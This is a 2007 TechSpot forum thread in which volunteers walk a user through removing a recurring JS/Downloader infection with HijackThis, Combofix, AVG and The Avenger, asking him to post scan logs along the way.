TechSpot

JS/Downloader Virus infection

By bkirby43
Oct 9, 2007
  1. Hi,

    My name is Bill. I see where you have instructions for another to clean her computer of the JS/Downloader virus. I would like similar help in cleaning my comuter of the same, please. Thanks.

    bkirby
     
  2. Rik

    Rik Banned Posts: 4,985

    Hi there bkirby43 and a big warm welcome to TechSpot!:)

    Below is the instruction set that will get you on the road to having a clean pc, please try to follow the instructions very closely and post here if you should run into any problems.

    You need to have a read of this - If your system is infected. Read this before deciding whether to CLEAN or REFORMAT.

    Then if you should wish to proceed with cleaning your system you need to go and read the Viruses/Spyware/Malware, preliminary removal instructions. Follow all the instructions exactly.

    Post fresh HJT, Combofix, and AVG Antispyware logs as ATTACHMENTS into this thread, only after doing the above.


    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  3. bkirby43

    bkirby43 TS Rookie Topic Starter

    Thanks Rik. Here I go...
     
  4. Rik

    Rik Banned Posts: 4,985

    No problem.:)

    It is a time consuming process but it can make a huge difference.

    Once done, please make sure that you ATTACH all 3 of the logs mentioned in my first post so that we can be sure of getting all your problems fixed. Please do not cut and paste them, it makes analyzing them far more difficult for us.



    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  5. bkirby43

    bkirby43 TS Rookie Topic Starter

    Dear Rik:

    Here's my first report...did the Panda Antirootlikt check and there no known or unknown rootkits. Good news? I hope so.

    Back to work. Incidentally, I ran the Cleaner. It said all would be deleted. But when I ran the analyzer, something was there and it said nothing had been deleted yet! Is that correct?

    More reports coming...as soon as I can figure this all out!!

    Regards,

    bill
     
  6. Rik

    Rik Banned Posts: 4,985

    Thats a good thing. :)



    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  7. Jase123

    Jase123 Banned Posts: 1,122

    Please post the fresh HJT, AVG Antispyware and Combofix logs as attachments.

    Afterall, you don't want people getting on to your system do you?

    So it's best to be on the safe side and let one of us here check it over to make sure your system is clean. :)

    Regards Jase :)

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  8. bkirby43

    bkirby43 TS Rookie Topic Starter

    Dear Gentlemen:

    Wow! What an exercise! But I do believe we've got it, I hope.

    I'm keeping my fingers crossed but I'm not experiencing the dreaded message saying that "JS/Downloader" is at it again. I kept getting the message as I accessed the net to reread your instructions until finally doing all the scan and fixes in safe mode. I noted that in the AVG Anti-spyware scan it deleted "BMC-adware," or something like that. Maybe that was the villian. Incidentally, I just started using Lime Wire to download music. Is that noted as a spyware carrier as one of my friends suggested? Who is this guy JS Downloader, anyway? I noticed from your forums I'm not the only one with this problem.

    Please have a look at my logs. I think I uploaded the proper ones.

    I hope this is it. Many thanks for all your help.

    Yours truly,

    Bill
     
  9. Rik

    Rik Banned Posts: 4,985

    I cant actually see any problems in your logs apart from 1 minor thing.

    Post an HJT log from normal mode just in case there is anything that wont show in safe mode.



    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  10. Jase123

    Jase123 Banned Posts: 1,122

    Be very careful with Limewire, as it is full of spyware.


    You HJT log looks clean, but let Howard check it over first as i am still in training.

    Regards Jase :)


    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  11. bkirby43

    bkirby43 TS Rookie Topic Starter

    I'll run the HJT log in normal. But...I spoke too soon! It's still there, not as frequently, but still there. When I use IE, sometimes an AVG window pops up telling me JS/Downloader Agent is there when IE tries to access the Temp File.

    Gentlemen,

    Here's the HJT log from normal mode. I hope it sheds some light on the subject.

    Thanks again,

    Bill
     
     
  12. Jase123

    Jase123 Banned Posts: 1,122

  13. Rik

    Rik Banned Posts: 4,985

    Nope, that log is far from clean.

    In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how here.> http://www.bleepingcomputer.com/forums/tutorial62.html

    Open your task manager, by holding down the ctrl and alt keys and pressing the delete key.

    Click on the processes tab and end process for(if there).

    Viewpoint
    Viewpoint Manager


    Close task manager.


    Go to add remove programmes in your control panel and uninstall anything to do with(if there).

    Viewpoint
    Viewpoint Manager


    Post a fresh HJT log from normal mode so that i can check if it has permantly gone.

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  14. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Hello and welcome to Techspot.

    Please do the following

    You might want to copy and paste these instructions into a notepad file. Then you can have the file open in safe mode, so you can follow the instructions easier.

    Boot into safe mode, under your normal user name(NOT THE ADMINISTRATOR ACCOUNT). See how HERE.

    In Windows Explorer, turn on "Show all files and folders, including hidden and system". See how HERE.

    Go to add remove programmes in your control panel and uninstall anything to do with(if there).

    Viewpoint
    viewpoint manager
    viewpoint toolbar

    Close control panel.

    Click start/run and type services.msc into the run box and press the enter key.

    When the window appears, maximise it. Double click on the following services(if there) and select stop if they are running. Set the startup type to disabled. Click apply/ok for each service you disable.

    Viewpoint Manager Service

    Close the services window.

    Run HJT with no other programmes open(except notepad). Click the scan button. Have HJT fix the following, by placing a tick in the little box next to(if there).

    O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe

    Click on the fix checked button.

    Close HJT.

    Locate and delete the following bold files and/or directories(if there).

    C:\Program Files\Viewpoint<Delete the entire folder.

    Reboot into normal mode and rehide your protected OS files.

    Post a fresh HJT log and let us know if you`re still having problems.

    Regards Howard :wave: :wave:

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  15. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Thanks for all the help. I will do as you instructed.

    Here is the result of the latest Housecall scan:

    No malware/spyware found. There were vulnerabilities that needed to be fixed amanually which I don't know how to do. Here they are:

    These ports are accessible:

    TCP.443
    TCP.80
    TCP.53
    TCP.25
    TCP.23
    TCP.22

    How should I proceed on this issue?

    Thanks,

    Bill
     
  16. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Providing your firewall is running properly, you shouldn`t be too worried.

    Please post a fresh HJT log after following the instructions in my post above.

    Regards Howard :)
     
  17. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Here's the HJT log after following the instructions above. In that process I did remove Viewpoint Manager and Viewpoint Media Player in the ADD/REMOVE panel. When I ran HJT in safe mode with all files displayed, 023-Viewpoint was not there to be fixed. Running TaskManager there was no Viewpoint to stop. I could not find a Viewpoint File in the Program Files after it was removed in the add/remove process. Finally, I cruised the net briefly before posting this and did not get the dreaded JS/Downloader message. But it has happened before that this guy takes a short recess before resuming his dirty tricks! I'll keep my fingersw crossed.

    Yours truly,

    Bill from Bombay
     
  18. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Your HJT log is now clean.

    Turn off system restore.(XP/ME only) See how HERE.

    Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


    If you have any further virus/spyware problems, please post in this thread.

    Regards Howard :)

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  19. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    I'm going to keep my fingers crossed that this guy, JS/Downloader, never resurfaces again. I can't thank your team enough. I didn't want to have to reformat.

    I would like a little advice. I now have ZoneAlarm, AVG AntiVirus (free) and AVG AntiSpyware (free) on and working on my computer. I don't mind buying the full version of each. Do I need to or is what I have adequate?

    Thanks again!

    Yours truly,

    Bill
     
  20. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    What you have is plenty good enough. Once the trial of AVG Antispyware ends, it will still carry on working and can still be updated etc. You just lose one or two features that`s all.

    Regards Howard :)

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  21. bkirby43

    bkirby43 TS Rookie Topic Starter

    That little bugger is back. I worked the net for about an hour, to see if he'd come back, and sure enough, he's back! It took a little while, but he came back. Here's the latest log.
     
  22. Rik

    Rik Banned Posts: 4,985

    Please describe your symptoms exactly.

    Also, can you please provide a combofix log as whatever is infecting your system is not showing its ugly head in your HJT log.


    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  23. bkirby43

    bkirby43 TS Rookie Topic Starter

    Here's the Combofix log.

    My symptom is that an AVG Window pops up now and then saying:

    "Virus found JS/Downloader.Agent"

    Then it goes on to say:

    C:\Documents and Settings\Bill\Local Settings\Temporary Internet Files\Content.IE5\EPRD26R7\Main[1].js

    The last part may be different each time.

    AVG can't fix or delete but only but in vault. Strange?

    Regards,

    Bill
     
  24. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 25,948   +19

    Run Ccleaner as per step9 of the instructions HERE.

    In Firefox, click Tools/clear private data/clear private data now.

    In IE, click Tool/internet options/delete cookies/ok/delete files/delete off line content/ok/clear history/yes Click ok and close IE.

    Go to your control panel and doube click the Java icon. Click the Update tab and click update now. Once the updates have been downloaded and installed, close Java. Go to add remove programmes and uninstall all versions of Java, except for the latest version which is version 6 update 3.

    1. Please download The Avenger by Swandog46 from HERE. Save it to your Desktop and extract it.

    2. Download the attached avengerscript.txt and save it to your desktop

    Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.

    3. Now, start The Avenger program by double clicking on its icon on your desktop.

    Under "Script file to execute" choose "Load script from file".
    Now click on the folder icon which will open a new window titled "open Script File"
    navigate to the file you have just downloaded, click on it and press open
    Now click on the Green Light to begin execution of the script
    Answer "Yes" twice when prompted.

    4. The Avenger will automatically do the following:

    It will Restart your computer. ( In cases where the code to execute contains "Drivers to Unload", The Avenger will actually restart your system twice.)
    On reboot, it will briefly open a black command window on your desktop, this is normal.
    After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
    The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.

    5. Please attach the content of c:\avenger.txt into your reply.

    Let us know if you`re still having problems.

    Regards Howard :)

    This thread is for the use of bkirby43 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  25. bkirby43

    bkirby43 TS Rookie Topic Starter

    Gentlemen:

    Here's the Avenger report. I noticed it was programed to find that specific file I mentioned in a previous report. First, each time AVG captures JS/Downloader.Agent, it's a new file path: C:\documents and settings\bill\localsettings\temporary internet files\content.IE5\ is always the same. But it's the last part that changes with each occurance. In the case I cited it was EPRD26R7\Main[1].js. But each successive appearance will have a new ending. Sorry, I should have been more clear on that.

    Here's what happened yesterday in my IE use. Last night I spent a lot of time just going from one site to another to see if site selection had anything to do with this bugger. I was JS/Downloader free the whole day. This morning I go to AOL to check my mail and that little rascal tried to GET OUT several times. It's as if he's been programed to lie low for a while and then pop up and sneak out when you least expect it. However, each time AVG catches him and I put him in the vault and then empty it. Ever since I loaded Zone Alarm there have been 70 something attempts by this guy to get out and only 2 attempts by somebody to get into my computer. All have been rejected by ZoneAlarm. Yippy!

    So...that's it in a nutshell. He's still here. Incidentally, why is he in TempInternetFile content.IE5 when I'm using something newer?

    Yours truly,

    Bill
     
Topic Status:
Not open for further replies.


Add New Comment

TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...


Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.